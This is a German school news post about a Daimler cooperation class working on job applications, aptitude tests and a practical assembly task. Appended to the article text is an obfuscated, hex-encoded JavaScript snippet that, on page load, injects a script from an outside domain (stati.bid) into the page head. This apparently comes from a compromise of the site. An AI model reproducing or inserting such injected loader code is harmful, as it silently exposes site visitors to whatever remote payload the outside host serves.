Realschule Florastraße

www.realschule-florastrasse.de

Kooperation mit Daimler

Hoch motiviert ging es Ende Februar mit der Daimler Klasse zur nächsten Runde. Das Modul 2 beinhaltet die Vertiefung der Bewerbungsprozesse. Neben der vertiefenden Einsicht in Bewerberauswahlverfahren für Auszubildende wie bedarfsorientiertes Training zur Vorbereitung auf Bewerbungsgespräche durften die Schülerinnen und Schüler der Daimler Klasse auch in einem theoretischen und praktischen Teil ihre Kompetenzen nachweisen. Im theoretischen Teil des Tests wurden Aufgaben in den Bereichen Sprachlogik, Zahlenreihen, räumliches Denken, praktisches Rechnen und technisches Verständnis gelöst. Im praktischen Teil ging es dann darum, mit Hilfe von Werkzeugen, Bleche nach Zeichnung zusammenzuschrauben.  Zum Abschluss erinnerte Herr de Rosa – Ausbildungsleiter bei Daimler – an die Ergebnisse der bisherigen Projekte mit Flora und stellte diese der aktuellen Daimler Klasse vor. Es wurden einmal Zukunftsautos aus Holz und Tonplastik gebastelt und bequeme Arbeitskleidung für Damen entworfen. Sehr kreativ unseren Daimler Klassen. Im Mai geht’s auf zur nächsten Runde. var _0x29b4=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64“];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

Kommentare sind geschlossen.